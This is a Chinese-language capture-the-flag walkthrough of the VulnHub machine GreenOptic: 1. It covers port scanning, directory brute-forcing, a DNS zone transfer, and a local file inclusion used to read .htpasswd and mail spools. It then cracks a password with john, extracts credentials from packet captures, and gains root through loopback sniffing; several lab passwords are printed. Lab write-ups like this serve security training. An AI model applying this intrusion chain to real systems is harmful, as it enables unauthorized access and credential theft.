GreenOptic: 1

下载地址：http://www.vulnhub.com/entry/greenoptic-1,510/

1. 端口扫描

开放端口信息，系统为centos7。

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.2
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
53/tcp    open  domain  ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
80/tcp    open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7

2. 脆弱服务

访问80端口，没有什么有价值的东西。
使用gobuster扫描目录，发现了目录account。

┌──(kali㉿kali)-[~/Documents/tools]
└─$ ./gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.102
/img                  (Status: 301) [Size: 234] [--> http://192.168.56.102/img/]
/account              (Status: 301) [Size: 238] [--> http://192.168.56.102/account/]

访问该目录，url直接为http://192.168.56.102/account/index.php?include=cookiewarning，尝试发现url中存在本地文件包含。
由于系统是centos7，默认apache的配置log为/etc/httpd/logs/access_log，/etc/httpd/logs/error_log，但是都无法读取。又试了其它一些常见的log都无法读取。尝试读取/etc/hostname，得到主机名为websrv01.greenoptic.vm，猜测apache设置了域名访问限制，结合服务器开启了dns解析服务，这里使用dig获取域greenoptic.vm下的所有域名。

┌──(kali㉿kali)-[~]
└─$ dig @192.168.56.102 greenoptic.vm axfr

; <<>> DiG 9.16.8-Debian <<>> @192.168.56.102 greenoptic.vm axfr
; (1 server found)
;; global options: +cmd
greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
greenoptic.vm.          3600    IN      NS      ns1.greenoptic.vm.
ns1.greenoptic.vm.      3600    IN      A       127.0.0.1
recoveryplan.greenoptic.vm. 3600 IN     A       127.0.0.1
websrv01.greenoptic.vm. 3600    IN      A       127.0.0.1
greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
;; Query time: 0 msec
;; SERVER: 192.168.56.102#53(192.168.56.102)
;; WHEN: Tue Nov 24 07:37:44 EST 2020
;; XFR size: 6 records (messages 1, bytes 235)

得到了另一个域名，设置hosts后访问。发现需要basicauth。
在常用弱口令破解失效后，这里使用gobuster跑受限访问文件，加载common.txt。

┌──(kali㉿kali)-[~/Documents/tools]
└─$ ./gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://recoveryplan.greenoptic.vm --wildcard|grep "Status: 403" 
/.hta                 (Status: 403) [Size: 206]
/.htaccess            (Status: 403) [Size: 211]
/.htpasswd            (Status: 403) [Size: 211]
/cache                (Status: 403) [Size: 207]        
/cgi-bin/             (Status: 403) [Size: 210]        
/config               (Status: 403) [Size: 208]        
/files                (Status: 403) [Size: 207]        
/includes             (Status: 403) [Size: 210]        
/store                (Status: 403) [Size: 207] 

用本地文件包含去读文件/.htaccess

Authtype Basic
AuthName "Restricted area"
AuthUserFile /var/www/.htpasswd
Require valid-user

按提示读/var/www/.htpasswd，得到加密用户名口令staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.。
这里使用john加载rockyou.txt破解，得到解密后的口令staff:wheeler，成功实现了basicauth，来到了phpbb。
按照key information的提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件，同时下载dpi.zip。

From [email protected]  Sun Jul 12 15:52:19 2020
Return-Path: <[email protected]>
X-Original-To: terry
Delivered-To: [email protected]
Received: from localhost (localhost [IPv6:::1])
	by websrv01.greenoptic.vm (Postfix) with ESMTP id C54E21090083
	for <terry>; Sun, 12 Jul 2020 15:51:32 +0100 (BST)
Message-Id: <[email protected]>
Date: Sun, 12 Jul 2020 15:51:32 +0100 (BST)
From: [email protected]

Terry

As per your request we have installed phpBB to help with incident response.
Your username is terry, and your password is wsllsa!2

Let us know if you have issues
Server Support - Linux

From [email protected]  Sun Jul 12 16:13:45 2020
Return-Path: <[email protected]>
X-Original-To: sam
Delivered-To: [email protected]
Received: from localhost (localhost [IPv6:::1])
	by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
	for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
Message-Id: <[email protected]>
Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
From: [email protected]

Hi Sam, per the team message, the password is HelloSunshine123

利用密码解压dpi.zip，使用wireshark分析dpi.pcap，过滤ftp协议，得到了新的用户名和密码alex:FwejAASD1。
ssh远程登陆，得到第一个shell。

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established. ECDSA key fingerprint is SHA256:D96eRXXFR5bMxuGFCt8OvBzYYZjHSpu+ksPl5jliY80. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts. [email protected]'s password: 
[[email protected] ~]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
[[email protected] ~]$ whoami
alex
[[email protected] ~]$ ls
user.txt
[[email protected] ~]$ cat user.txt 
Well done. Now to try and get root access.

Think outside of the box!

（补充一下，其实这里还有一种方法获取shell，该版本的phpbb存在远程命令执行，使用邮件中的账号可以以管理员登陆。）

3. 获取root

用户alex文件夹下有一个wireshark文件夹，同时还发现alex属于wireshark用户组。

[[email protected] ~]$ ls -all
total 20
drwx------. 3 alex alex 136 Jul 12 22:12 .
drwxr-xr-x. 6 root root  57 Jul 12 22:12 ..
lrwxrwxrwx. 1 root root   9 Jul 12 22:12 .bash_history -> /dev/null
-rw-r--r--. 1 alex alex  18 Apr  1  2020 .bash_logout
-rw-r--r--. 1 alex alex 193 Apr  1  2020 .bash_profile
-rw-r--r--. 1 alex alex 231 Apr  1  2020 .bashrc
-rwx------. 1 alex alex  70 Jul 12 22:06 user.txt
drwxr-xr-x. 2 alex alex  41 Jul 12 21:33 .wireshark
-rw-------. 1 alex alex 100 Jul 12 20:50 .Xauthority
[[email protected] ~]$ cat /etc/group|grep wireshark
wireshark:x:994:alex

于是这里使用dumpcap抓取本地环回地址包一段时间，下载到本地使用wireshark解析。

[[email protected] ~]$ dumpcap -w test.pcap -i lo
Capturing on 'Loopback'
File: test.pcap
Packets captured: 42
Packets received/dropped on interface 'Loopback': 42/0 (pcap:0/dumpcap:0/flushed:0) (100.0%)

发现有Auth包，base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o。

[[email protected] ~]$ su - root
Password: 
[[email protected] ~]# cat root.txt 
Congratulations on getting root!

  ____                      ___        _   _      
 / ___|_ __ ___  ___ _ __  / _ \ _ __ | |_(_) ___ 
| |  _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __| | |_| | | | __/ __/ | | | |_| | |_) | |_| | (__ \____|_| \___|\___|_| |_|\___/| .__/ \__|_|\___| |_| You've overcome a series of difficult challenges, so well done!

I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.

*********
Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
*********

Thanks,
bootlesshacker

4. 知识点回顾

• gobuster子目录、目录文件爆破
• dig获取域名服务器某域下所有子域名 axfr